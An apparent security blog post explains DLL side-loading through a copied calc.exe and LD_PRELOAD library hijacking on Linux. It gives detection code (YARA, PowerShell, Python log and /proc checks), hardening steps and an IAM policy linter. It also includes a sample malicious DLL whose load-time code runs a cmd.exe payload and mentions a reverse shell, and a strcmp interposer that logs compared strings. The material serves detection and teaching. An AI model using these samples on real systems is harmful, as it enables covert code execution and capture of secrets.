The Calculator Con: How Hackers Are Using calcexe to Hijack Your System


Introduction:

In a stark reminder that threats often hide in plain sight, cybersecurity researchers have unveiled a novel attack vector leveraging the ubiquitous Windows Calculator (calc.exe). This technique, involving DLL side-loading, allows malicious actors to execute arbitrary code under the guise of a trusted, signed Microsoft application, bypassing traditional security defenses and user suspicion.

Learning Objectives:

  • Understand the mechanism of DLL side-loading attacks through trusted executables.
  • Learn to detect malicious activity masquerading as legitimate Windows processes.
  • Implement hardening measures to mitigate the risk of living-off-the-land binary (LOLBin) attacks.

You Should Know:

1. The Mechanics of the calc.exe DLL Side-Loading Hack

The attack exploits the Windows DLL search order. When `calc.exe` is launched, it may attempt to load certain DLLs from its immediate directory before checking system locations. By placing a maliciously crafted DLL (e.g., windows.storage.dll) alongside a copy of the legitimate `calc.exe` in a controlled folder, attackers can trick the calculator into loading and executing their code with the same privileges as the parent process.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: The attacker obtains a copy of the legitimate `calc.exe` (from a clean Windows system).
Step 2: They create a malicious DLL with a specific export that `calc.exe` requests (e.g., DllGetClassObject). This DLL contains the payload.

// Simplified malicious DLL (windows.storage.dll) pseudocode, as described above
#include <windows.h>
#include <stdlib.h>

// Runs when calc.exe maps the DLL; this is where the side-loaded payload executes.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c whoami > C:\\temp\\hack.txt"); // Example payload
        // Alternatively, spawn a reverse shell or beacon
    }
    return TRUE;
}

// The export calc.exe resolves from windows.storage.dll; can be a simple stub.
STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID *ppv) {
    return CLASS_E_CLASSNOTAVAILABLE;
}

Step 3: The attacker places both files in a directory and executes calc.exe. The OS loads the malicious windows.storage.dll, triggering the payload.

2. Detection: Hunting for Malicious calc.exe Instances

Legitimate `calc.exe` runs from C:\Windows\System32\. Instances running from any other location are highly suspicious. Use endpoint detection (EDR) queries or simple command-line audits.

Step 1: On a Windows system, use PowerShell to find running `calc.exe` processes and their paths:

Get-Process calc -ErrorAction SilentlyContinue | Select-Object Name, Path, Id

Step 2: Analyze any instance where the `Path` is not C:\Windows\System32\calc.exe. Investigate the parent process and directory contents.
Step 3: For proactive hunting, deploy a YARA rule to memory or disk to detect the known malicious DLL pattern.

rule Suspect_WindowsStorage_DLL {
    meta:
        description = "Detects potential malicious windows.storage.dll for side-loading"
        author = "Your-SOC"
    strings:
        $calc_import = "calc.exe" wide
        $suspect_export = "DllGetClassObject"
        $shell_cmd = /cmd.exe.\/c/ wide
    condition:
        all of them and filesize < 500KB
}
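Detection logic for Steps 2 and 3 above, as an added example that is not part of the original post: it runs over constructed Sysmon-style process-create and image-load events (the key=value form is an assumption, not Sysmon's real XML) and flags a system binary launched outside System32, a system DLL name resolved from elsewhere, and any DLL loaded from the executable's own directory.

```python
import ntpath
import re

# Constructed Sysmon-style events in a simplified key=value form (EventID 1 =
# process create, EventID 7 = image load). Not real telemetry; paths carry no spaces.
SAMPLE_EVENTS = [
    "EventID=1 Image=C:\\Windows\\System32\\calc.exe ParentImage=C:\\Windows\\explorer.exe",
    "EventID=7 Image=C:\\Windows\\System32\\calc.exe ImageLoaded=C:\\Windows\\System32\\windows.storage.dll",
    "EventID=1 Image=C:\\Users\\bob\\Downloads\\calc.exe ParentImage=C:\\Windows\\System32\\cmd.exe",
    "EventID=7 Image=C:\\Users\\bob\\Downloads\\calc.exe ImageLoaded=C:\\Users\\bob\\Downloads\\windows.storage.dll",
    "EventID=7 Image=C:\\Tools\\app.exe ImageLoaded=C:\\Tools\\helper.dll",
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARIES = {"calc.exe"}              # extend with the other LOLBins you baseline
SYSTEM_DLL_NAMES = {"windows.storage.dll"}  # DLL names that must only come from SYSTEM_DIRS

def parse_event(line):
    """Turn 'Key=Value Key=Value' into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)

def analyze(lines):
    """Return a list of findings; each carries the triggering rule and the paths involved."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        image = ev.get("Image", "")
        if ev.get("EventID") == "1":
            # Rule 1: a known system binary name running from outside the system directories
            if ntpath.basename(image).lower() in SYSTEM_BINARIES and not in_system_dir(image):
                findings.append({"rule": "system_binary_outside_system32",
                                 "image": image, "parent": ev.get("ParentImage")})
        elif ev.get("EventID") == "7":
            dll = ev.get("ImageLoaded", "")
            same_dir = ntpath.dirname(dll).lower() == ntpath.dirname(image).lower()
            if ntpath.basename(dll).lower() in SYSTEM_DLL_NAMES and not in_system_dir(dll):
                # Rule 2: a system DLL name resolved from a non-system path (classic side-load)
                findings.append({"rule": "system_dll_outside_system32", "image": image, "dll": dll})
            elif same_dir and not in_system_dir(dll):
                # Rule 3: DLL loaded from the executable's own directory; benign for many
                # applications, so treat it as a hunting lead rather than an alert
                findings.append({"rule": "dll_loaded_from_image_dir", "image": image, "dll": dll})
    return findings
```

Rule 3 is expected to be noisy on its own; it earns its keep when combined with the parent-process and directory review described in Step 2.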

3. Mitigation: Hardening Against DLL Side-Loading

Prevention focuses on controlling DLL search paths and applying robust security policies.

Step 1: Enable Attack Surface Reduction (ASR) Rules. In Microsoft Defender, enable the rule “Block executable content from email client and webmail” and “Block all Office applications from creating child processes,” which can catch payload delivery.
Step 2: Implement Code Integrity Policies. Use Windows Defender Application Control (WDAC) to allow only trusted, signed applications from specified paths to run.

# Example to audit policies (Run as Admin)
$PolicyPath = "$env:USERPROFILE\Desktop\SiPolicy.xml"
New-CIPolicy -Level Publisher -FilePath $PolicyPath -Audit

Step 3: Set DLL Search Order Safeguards. Use Group Policy or registry keys to strengthen DLL loading: under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager`, set the `CWDIllegalInDllSearch` REG_DWORD to `0xFFFFFFFF` to prevent loading from the current working directory. Note that this value governs only the current working directory, not the application's own directory, so it does not by itself stop the side-load from section 1, where the DLL sits next to the copied `calc.exe`; pair it with the WDAC policy from Step 2.

4. Linux Parallel: Shared Library Hijacking with ld.so

The core concept is not Windows-specific. Linux is vulnerable to similar shared library (.so) hijacking via the `LD_PRELOAD` or `LD_LIBRARY_PATH` environment variables.

Step 1: A simple malicious library to intercept strcmp.

// mal_lib.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>

// Interposed strcmp: logs both arguments, then forwards to the real libc strcmp.
int strcmp(const char *s1, const char *s2) {
    printf("[bash] Comparing '%s' with '%s'\n", s1, s2);
    // Look up the next strcmp in the search order (the real one in libc)
    int (*original_strcmp)(const char *, const char *);
    original_strcmp = (int (*)(const char *, const char *))dlsym(RTLD_NEXT, "strcmp");
    return original_strcmp(s1, s2);
}

Step 2: Compile and test the hijack.

gcc -shared -fPIC -o mal_lib.so mal_lib.c -ldl
LD_PRELOAD=./mal_lib.so ls   # Any command that uses strcmp will now log

Step 3: Mitigation: the dynamic loader ignores `LD_PRELOAD` and `LD_LIBRARY_PATH` for setuid/setgid binaries on modern systems, so never rely on running SUID binaries with `LD_` variables set; use tools like `strace` or `ltrace` to monitor for unexpected library loads and calls.
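A defender-side check for the hijack above, as an added example that is not part of the original post: it parses the `/proc/<pid>/maps` format to list executable shared-object mappings outside the usual library directories (the trusted-directory list is an assumption to tune per distribution) and reports the two preload hooks, `LD_PRELOAD` and `/etc/ld.so.preload`; the sample maps excerpt is constructed.

```python
import os
import re

# Directories shared objects normally load from on a typical Linux distribution
# (assumption for this example; tune it to the system you baseline).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")

# Constructed /proc/<pid>/maps excerpt for an `ls` process: libc from its normal
# location plus a library mapped from /tmp, as an LD_PRELOAD of mal_lib.so would produce.
SAMPLE_MAPS = """\
55d0c2a00000-55d0c2a20000 r-xp 00000000 08:01 131077   /usr/bin/ls
7f3a1c000000-7f3a1c001000 r-xp 00000000 08:01 262144   /tmp/mal_lib.so
7f3a1c200000-7f3a1c3c0000 r-xp 00000000 08:01 393216   /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a1c400000-7f3a1c402000 rw-p 00000000 00:00 0
7ffd5e000000-7ffd5e021000 rw-p 00000000 00:00 0        [stack]
"""

# maps line layout: address perms offset dev inode [pathname]
MAPS_LINE = re.compile(r"^\S+ (\S{4}) \S+ \S+ \S+\s*(.*)$")

def mapped_libraries(maps_text):
    """File-backed mappings with execute permission whose file name looks like a .so."""
    libs = set()
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        perms, path = m.groups()
        if "x" in perms and path.startswith("/") and ".so" in os.path.basename(path):
            libs.add(path)
    return libs

def untrusted_libraries(maps_text):
    """Libraries mapped from outside TRUSTED_LIB_DIRS: the LD_PRELOAD/LD_LIBRARY_PATH hijack signature."""
    return sorted(p for p in mapped_libraries(maps_text) if not p.startswith(TRUSTED_LIB_DIRS))

def preload_indicators(env, ld_so_preload_text=""):
    """Report the environment hook and any entries from /etc/ld.so.preload (pass its content)."""
    hits = ["LD_PRELOAD=" + env["LD_PRELOAD"]] if env.get("LD_PRELOAD") else []
    hits += ["ld.so.preload:" + entry for entry in ld_so_preload_text.split()]
    return hits

def check_pid(pid):
    """Inspect a live Linux process by pid; returns (untrusted libraries, preload indicators)."""
    with open(f"/proc/{pid}/maps") as fh:
        return untrusted_libraries(fh.read()), preload_indicators(os.environ)
```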

5. Broader Implications for API and Cloud Security

This attack underscores the “trust but verify” principle. In cloud environments, analogous risks exist with trusted service roles and functions. An attacker with initial access can abuse high-permission roles to launch further attacks from a “trusted” entity.

Step 1: In AWS, regularly audit IAM roles attached to EC2 instances or Lambda functions using the CLI:

aws iam list-attached-role-policies --role-name MyAppInstanceRole

Step 2: Apply the principle of least privilege. Replace overly permissive policies (e.g., `"Action": "*"`) with specific actions and resources.
Step 3: Monitor CloudTrail logs for unusual `AssumeRole` or `InvokeFunction` events originating from unexpected regions or times, which could indicate a trusted component has been compromised.
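The least-privilege audit of Steps 1 and 2 above, as an added example that is not part of the original post: it lints a policy document of the shape the IAM API returns (the sample policy is constructed, not from any real account) and flags Allow statements whose Action or Resource is a wildcard, which is exactly what the `"Action": "*"` replacement targets.

```python
import json

# Constructed policy document in the shape returned by `aws iam get-policy-version`;
# not from any real account.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AdminEverything", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "AppBucket", "Effect": "Allow",
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-app-bucket/*"},
    {"Sid": "IamWildcard", "Effect": "Allow", "Action": "iam:*", "Resource": "*"},
    {"Sid": "ReadAnyBucket", "Effect": "Allow", "Action": "s3:GetObject", "Resource": "*"},
    {"Sid": "DenyInsecure", "Effect": "Deny", "Action": "*", "Resource": "*",
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}}
  ]
}""")

def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]

def _is_wild_action(action):
    # "*" grants every action; "svc:*" grants every action of one service.
    return action == "*" or action.endswith(":*")

def overly_permissive(policy):
    """Return findings for Allow statements that use wildcards in Action or Resource."""
    findings = []
    for index, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements with wildcards are restrictive, not permissive
        wild_actions = [a for a in _as_list(stmt.get("Action", [])) if _is_wild_action(a)]
        wild_resources = [r for r in _as_list(stmt.get("Resource", [])) if r == "*"]
        if "NotAction" in stmt:
            wild_actions.append("NotAction")  # everything except the listed actions
        if not (wild_actions or wild_resources):
            continue
        findings.append({
            "sid": stmt.get("Sid", f"statement[{index}]"),
            "wild_actions": wild_actions,
            "wild_resources": wild_resources,
            "severity": "critical" if wild_actions and wild_resources else "high",
        })
    return findings

if __name__ == "__main__":
    print(json.dumps(overly_permissive(SAMPLE_POLICY), indent=2))
```

Feed it the `PolicyDocument` from `aws iam get-policy-version --policy-arn ... --version-id ...` for each policy listed by the `list-attached-role-policies` call in Step 1.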

What Undercode Say:

  • Trust is the Weakest Link. The most insidious attacks don’t breach walls; they walk through the front door by abusing inherent trust in signed applications and system processes. Security monitoring must evolve beyond process names to inspect behavior, lineage, and provenance.
  • The LOLBin Arms Race is Accelerating. The use of Living-Off-the-Land Binaries (LOLBins) like `calc.exe`, `msbuild.exe`, or `powershell.exe` is becoming the standard, not the exception. Defenders must curate and monitor an allow-list of normal behaviors for these tools within their specific environment, as blocking them entirely is often impractical.

This calc.exe hack is not an isolated vulnerability but a symptom of a pervasive threat model. It represents the sophisticated abuse of intended functionality, making it a potent technique for both initial access and persistence. As EDR solutions get better at spotting obfuscated scripts and binary malware, attackers will increasingly invest in these “clean” techniques that leave a minimal forensic footprint.

Prediction:

The future of endpoint attacks will be dominated by “identity-centric” execution, where malicious activity is indistinguishable from legitimate user and system behavior. We will see a rise in malware that exclusively uses signed binaries and legitimate cloud APIs, forcing a paradigm shift in detection towards continuous authentication validation, behavior baselining, and AI-driven anomaly detection that analyzes the intent behind a sequence of actions, not just the actions themselves. The line between compromise and normal operation will blur, demanding defense-in-depth that spans identity, endpoint, and cloud workload security.

Reported By: Larisa M – Hackers Feeds